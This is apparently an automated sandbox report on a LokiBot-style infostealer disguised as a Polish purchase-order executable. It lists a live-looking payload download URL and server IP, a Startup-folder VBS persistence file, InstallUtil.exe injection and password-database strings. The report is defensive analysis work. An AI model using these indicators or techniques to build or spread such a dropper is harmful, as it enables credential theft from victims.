Source: InstallUtil.exe, 00000007.00000002.3305781323.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.neta
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.netth
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.0000000003061000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://erkasera.com
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.0000000003061000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://erkasera.com/ruurew/Cwfuvfaf.wav
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, FieldNames.exe.0.dr	String found in binary or memory: https://erkasera.com/ruurew/Cwfuvfaf.wav1B4MrP3veGRoRMM0tnPgU/Q==
Source: InstallUtil.exe, 00000007.00000002.3306909563.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3307042263.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.000000000461F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: InstallUtil.exe, 00000002.00000002.3308084634.0000000003660000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3306426620.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3306652645.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3308180421.00000000038D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443

Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.5:49717 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Writes or reads registry keys via WMI

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey

Detected potential crypto function

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015EE9B0	0_2_015EE9B0
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015ECF30	0_2_015ECF30
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E9058	0_2_015E9058
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E9048	0_2_015E9048
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E9660	0_2_015E9660
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E96C0	0_2_015E96C0
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_05F80040	0_2_05F80040
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_05F80006	0_2_05F80006
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_076FDE60	0_2_076FDE60
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_076E0040	0_2_076E0040
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_076E0022	0_2_076E0022
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013CCF30	6_2_013CCF30
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C9058	6_2_013C9058
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C9048	6_2_013C9048
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C9660	6_2_013C9660
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C96C0	6_2_013C96C0
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_074DDE60	6_2_074DDE60
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_074C0040	6_2_074C0040
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_074C0006	6_2_074C0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0040BDEF	7_2_0040BDEF

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, F3SOmS1RfeVd8H521qy.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, F3SOmS1RfeVd8H521qy.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, F3SOmS1RfeVd8H521qy.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, F3SOmS1RfeVd8H521qy.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: InstallUtil.exe	Binary or memory string: C*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: InstallUtil.exe, 00000002.00000002.3304176080.0000000000436000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3304177579.0000000000428000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: <@*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: `C6-@`C*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: InstallUtil.exe	Binary or memory string: @*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@8/5@2/2

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Mutant created: NULL

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs"

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: InstallUtil.exe	Binary or memory string: SELECT item1 FROM metadata WHERE id = 'password';
Source: LogfirebirdULzauCAPrOnmUabaculus.2.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File read: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe "C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe"
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\FieldNames.exe "C:\Users\user\AppData\Roaming\FieldNames.exe"
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\FieldNames.exe "C:\Users\user\AppData\Roaming\FieldNames.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sxs.dll	Jump to behavior
